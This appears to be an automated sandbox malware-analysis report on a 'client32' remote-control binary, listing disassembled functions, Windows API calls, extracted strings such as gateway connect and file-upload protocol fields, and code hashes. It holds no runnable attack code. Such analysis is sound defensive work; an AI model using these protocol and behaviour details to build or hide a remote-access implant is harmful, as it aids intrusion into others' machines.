                                                                                                                                        • SetTimer.USER32(00000000,00000000,000003E8,00000000), ref: 1102543A
                                                                                                                                        • KillTimer.USER32(00000000,00000000,00000080,00000002), ref: 110254A0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$TimerWindow$DeleteDrawErrorExitIconicKillLastMessageProcessUpdatewsprintf
                                                                                                                                        • String ID: ..\ctl32\chatw.cpp$Chat$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                        • API String ID: 3085788722-363603473
                                                                                                                                        • Opcode ID: e69d78fb2f8639c597be4dd6d8a4cfc2e884be2be3f7c90e4c2329286fe3b857
                                                                                                                                        • Instruction ID: b6232a099581f0ae497a3b344fdba13ecce31f738ecb0fc666d570829b7bf44f
                                                                                                                                        • Opcode Fuzzy Hash: e69d78fb2f8639c597be4dd6d8a4cfc2e884be2be3f7c90e4c2329286fe3b857
                                                                                                                                        • Instruction Fuzzy Hash: 14D1AC74B40702ABEB14DB64CC85FAEB3A5BB88708F104558F6529F3C1DAB1F941CB95
                                                                                                                                        Function 1115B180 Relevance: 17.9, APIs: 8, Strings: 2, Instructions: 440COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetWindowLongA.USER32(?,000000FC,?), ref: 1115B1C6
                                                                                                                                        • RemovePropA.USER32(?), ref: 1115B1E5
                                                                                                                                        • RemovePropA.USER32(?), ref: 1115B1F4
                                                                                                                                        • RemovePropA.USER32(?,00000000), ref: 1115B203
                                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                        • CallWindowProcA.USER32(?,?,?,?,?), ref: 1115B55A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PropRemove$Window$CallErrorExitLastLongMessageProcProcesswsprintf
                                                                                                                                        • String ID: ..\ctl32\wndclass.cpp$old_wndproc
                                                                                                                                        • API String ID: 1777853711-3305400014
                                                                                                                                        • Opcode ID: c3063e6233cfac457fb0abdd6f1d250989d48feedc8840d264afa341f117270a
                                                                                                                                        • Instruction ID: ee076e1b1c12c59e2fd2c34d2ca2faed304bf4b043a58102cf48aae30fabbc62
                                                                                                                                        • Opcode Fuzzy Hash: c3063e6233cfac457fb0abdd6f1d250989d48feedc8840d264afa341f117270a
                                                                                                                                        • Instruction Fuzzy Hash: 43C17BB53041199FD748CE69E890E7FB3EAFBC8311B10466EF956C7781DA21AC118BB1
                                                                                                                                        Function 68921CC1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,6892232A,?,68917F44,?,000000BC,?), ref: 68921D00
                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,6892232A,?,68917F44,?,000000BC,?), ref: 68921D29
                                                                                                                                        • GetACP.KERNEL32(?,?,6892232A,?,68917F44,?,000000BC,?), ref: 68921D3D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoLocale
                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                                        • Opcode ID: 042840047f75bea54fd44042b13636af3ec53220d514dbb5e35b780729bbc71d
                                                                                                                                        • Instruction ID: 5d43d1fc537943197fbfbd22ccefa68043efa96b59cbc2bfe9b39f6c1bc0d3c5
                                                                                                                                        • Opcode Fuzzy Hash: 042840047f75bea54fd44042b13636af3ec53220d514dbb5e35b780729bbc71d
                                                                                                                                        • Instruction Fuzzy Hash: 8201423061A20AFFEB218B64DC28B5E33BCAF0331DFA08658E452E2484EB21E611C650
                                                                                                                                        Function 688F5490 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 20COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 688F5290: CloseHandle.KERNEL32(00000000,688F5678), ref: 688F529A
                                                                                                                                        • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,nextfileindex,00000001,C:\Users\user\AppData\Roaming\Cisco\Support\pci.ini), ref: 688F54A7
                                                                                                                                        Strings
                                                                                                                                        • C:\Users\user\AppData\Roaming\Cisco\Support\, xrefs: 688F54BB, 688F54C6
                                                                                                                                        • htctl.packet_tracing, xrefs: 688F54A2
                                                                                                                                        • C:\Users\user\AppData\Roaming\Cisco\Support\pci.ini, xrefs: 688F5496
                                                                                                                                        • nextfileindex, xrefs: 688F549D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandlePrivateProfile
                                                                                                                                        • String ID: C:\Users\user\AppData\Roaming\Cisco\Support\$C:\Users\user\AppData\Roaming\Cisco\Support\pci.ini$htctl.packet_tracing$nextfileindex
                                                                                                                                        • API String ID: 3401662979-31437938
                                                                                                                                        • Opcode ID: d9bf9f78cef537f50ddc5548bdd904e623b66c66c4eb658f739dfce0e30bb076
                                                                                                                                        • Instruction ID: 322adfdc95eec79150cd57628124726af46563b59949ec6ad1c6b1dd0dabaa25
                                                                                                                                        • Opcode Fuzzy Hash: d9bf9f78cef537f50ddc5548bdd904e623b66c66c4eb658f739dfce0e30bb076
                                                                                                                                        • Instruction Fuzzy Hash: 05D05EB9CC1B343FD62022982C08FAD1E86EB9135DFC08860F92877540C711B88381B9
                                                                                                                                        Function 689128E1 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 68918BA8
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 68918BBD
                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(6893427C), ref: 68918BC8
                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 68918BE4
                                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 68918BEB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2579439406-0
                                                                                                                                        • Opcode ID: 122d669dee120e502b3f971bff547ff8ee5d6d1c9daf7446763489c9478426ef
                                                                                                                                        • Instruction ID: 54245b40e83dafccd110f2329ae8e7ebcf076d48249555c2b786dfaf74346818
                                                                                                                                        • Opcode Fuzzy Hash: 122d669dee120e502b3f971bff547ff8ee5d6d1c9daf7446763489c9478426ef
                                                                                                                                        • Instruction Fuzzy Hash: 262199B882C208DFDF70DF69E5A8A4C3BB8FB1A314F40415AE94997384E7B49991CF45
                                                                                                                                        Function 1101D180 Relevance: 4.6, APIs: 3, Instructions: 82timeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __time64.LIBCMT ref: 1101D213
                                                                                                                                        • SetRect.USER32(?,00000000,00000000,00000000,00000000), ref: 1101D232
                                                                                                                                        • GetLocalTime.KERNEL32(00000002), ref: 1101D25C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LocalRectTime__time64
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 394334608-0
                                                                                                                                        • Opcode ID: de18328b6b15506cedc7e23451f66c7985023e4612589437c270b1aaafaaec95
                                                                                                                                        • Instruction ID: 290189b485d165d605b85d0a399bd35ca550a15b876ac08f977e3d1591b43d19
                                                                                                                                        • Opcode Fuzzy Hash: de18328b6b15506cedc7e23451f66c7985023e4612589437c270b1aaafaaec95
                                                                                                                                        • Instruction Fuzzy Hash: 01316C75904B44DFD320CF68D944B9AFBE8EB48714F00896EE86AC7780DB34E904CB51
                                                                                                                                        Function 68922151 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • EnumSystemLocalesA.KERNEL32(Function_00031DB6,00000001), ref: 68922164
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EnumLocalesSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2099609381-0
                                                                                                                                        • Opcode ID: 7fd294ad1fb48d33134785c5398c565300649b37e42b4deab272460708932a6c
                                                                                                                                        • Instruction ID: 23148bef0e375d982fb140e1a3f493016fb60d9a752640c29e43c3dccd1990cb
                                                                                                                                        • Opcode Fuzzy Hash: 7fd294ad1fb48d33134785c5398c565300649b37e42b4deab272460708932a6c
                                                                                                                                        • Instruction Fuzzy Hash: DDD0C970A647069BEB24CE64C608B65BAE4EB42B19F908B0CDA97854C5D775E0848640
                                                                                                                                        Function 689048E0 Relevance: 59.8, APIs: 17, Strings: 17, Instructions: 327COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$_fseek$__fsopen_free_memset
                                                                                                                                        • String ID: CMD=PUTFILE$DATA=$FLEN=%d$FNAME=%s$GSK=%s$Gateway_Gsk$Gateway_Operator$Gateway_Password$MORE=%d$OFFSET=%d$ON=%s$PWD=%s$SUB=%s$ctl_putfile - _filelength FAILED (error: %d)$ctl_putfile - _topen FAILED (error: %d)$ctl_putfile - empty file (%s)$putfile - _read FAILED (error: %d)
                                                                                                                                        • API String ID: 908761794-2149975586
                                                                                                                                        • Opcode ID: 99ef52c176f2f90fd3195d158afd0d92038640b6076463ac565c01a9cbbc5cec
                                                                                                                                        • Instruction ID: 78f6deb5d220d389fcafb5be63f920ca4dba0ccb1601893fd517f008638e8f72
                                                                                                                                        • Opcode Fuzzy Hash: 99ef52c176f2f90fd3195d158afd0d92038640b6076463ac565c01a9cbbc5cec
                                                                                                                                        • Instruction Fuzzy Hash: 69B194B5D04228ABDB20DBF8CC44FEEB778AF95308F904559E514A7241EB31DA45CFA1
                                                                                                                                        Function 688FD140 Relevance: 54.6, APIs: 15, Strings: 16, Instructions: 362sleepsynchronizationCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 688FD1BA
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000300,000000FF,00000001,00000000), ref: 688FD1E1
                                                                                                                                          • Part of subcall function 68907BE0: _memset.LIBCMT ref: 68907BFF
                                                                                                                                          • Part of subcall function 68907BE0: _strncpy.LIBCMT ref: 68907C0B
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 688FD212
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688FD223
                                                                                                                                          • Part of subcall function 688F8C30: _memset.LIBCMT ref: 688F8C5B
                                                                                                                                          • Part of subcall function 688F8C30: _free.LIBCMT ref: 688F8CCC
                                                                                                                                          • Part of subcall function 688F8B50: _memset.LIBCMT ref: 688F8B68
                                                                                                                                          • Part of subcall function 688F8B50: wsprintfA.USER32 ref: 688F8B87
                                                                                                                                        • _free.LIBCMT ref: 688FD39A
                                                                                                                                        • _strncpy.LIBCMT ref: 688FD3C9
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                          • Part of subcall function 688F5060: _free.LIBCMT ref: 688F506A
                                                                                                                                          • Part of subcall function 688F5060: _malloc.LIBCMT ref: 688F5090
                                                                                                                                        • _free.LIBCMT ref: 688FD4D5
                                                                                                                                        • _free.LIBCMT ref: 688FD53F
                                                                                                                                        • _free.LIBCMT ref: 688FD545
                                                                                                                                        • Sleep.KERNEL32(00000014), ref: 688FD573
                                                                                                                                        • _free.LIBCMT ref: 688FD5C8
                                                                                                                                        • Sleep.KERNEL32(00000064,?,?,?,?), ref: 688FD5DC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$_memset$CriticalSectionSleep_strncpy$EnterLeaveObjectSingleWait__vswprintf_mallocwsprintf
                                                                                                                                        • String ID: 1.1$305090$CLIENT_IP_ADDRESS=%s$CLIENT_IP_ADDRESS=0.0.0.0$CLIENT_NAME=%s$CMD=CTL_CONNECT$CONTROL_NAME=%s$GSK=%s$Gateway_Gsk$Gateway_Password$Gateway_Username$HOSTNAME=%s$MACADDRESS=%s$PROTOCOL_VER=%u.%u$PWD=%s$USER=%s
                                                                                                                                        • API String ID: 2732282590-827811004
                                                                                                                                        • Opcode ID: 6f3a5753a125217334967c2b27ee1866e5a56673c056d8ca444a05974ff614e0
                                                                                                                                        • Instruction ID: f02f3c215ba585f19fddfbe85b7c5af881415809be36ecf9803a132a44e6676b
                                                                                                                                        • Opcode Fuzzy Hash: 6f3a5753a125217334967c2b27ee1866e5a56673c056d8ca444a05974ff614e0
                                                                                                                                        • Instruction Fuzzy Hash: 17E1E7B5D44628AFCB21CF68CC40FEEB778AF8A304F844599E61D67240E735AA41CF91
                                                                                                                                        Function 6892B242 Relevance: 54.3, APIs: 36, Instructions: 344COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • operator+.LIBCMT ref: 6892B25D
                                                                                                                                          • Part of subcall function 6892836C: DName::DName.LIBCMT ref: 6892837F
                                                                                                                                          • Part of subcall function 6892836C: DName::operator+.LIBCMT ref: 68928386
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: NameName::Name::operator+operator+
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2937105810-0
                                                                                                                                        • Opcode ID: bdba24d19413db602aefc3c00b0068f579fa47848bb6e4ece00853a94454206d
                                                                                                                                        • Instruction ID: a7f3c3fc6fa8183f1a31f813eef3c129a4f19645ad571f44537cc2b5ae0bfff6
                                                                                                                                        • Opcode Fuzzy Hash: bdba24d19413db602aefc3c00b0068f579fa47848bb6e4ece00853a94454206d
                                                                                                                                        • Instruction Fuzzy Hash: 6ED13D75920209EFDF04DFA8C8A5AEEBBF8EF19314F804066E511EB255DB30DA45CB61
                                                                                                                                        Function 68905170 Relevance: 52.8, APIs: 17, Strings: 13, Instructions: 281sleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 689051AD
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 6890522C
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 68905245
                                                                                                                                        • _free.LIBCMT ref: 68905348
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                          • Part of subcall function 688F5060: _free.LIBCMT ref: 688F506A
                                                                                                                                          • Part of subcall function 688F5060: _malloc.LIBCMT ref: 688F5090
                                                                                                                                        • _free.LIBCMT ref: 689053DD
                                                                                                                                        • _memset.LIBCMT ref: 689053F4
                                                                                                                                        • _free.LIBCMT ref: 68905448
                                                                                                                                          • Part of subcall function 68907B60: _sprintf.LIBCMT ref: 68907B77
                                                                                                                                          • Part of subcall function 689077E0: _free.LIBCMT ref: 689077EF
                                                                                                                                        • _free.LIBCMT ref: 689054AC
                                                                                                                                        • _free.LIBCMT ref: 689054BB
                                                                                                                                        • GetTickCount.KERNEL32 ref: 689054C9
                                                                                                                                        • GetTickCount.KERNEL32 ref: 689054D3
                                                                                                                                        • Sleep.KERNEL32(00000014), ref: 689054E9
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 68905512
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 6890554D
                                                                                                                                        • _free.LIBCMT ref: 689053A3
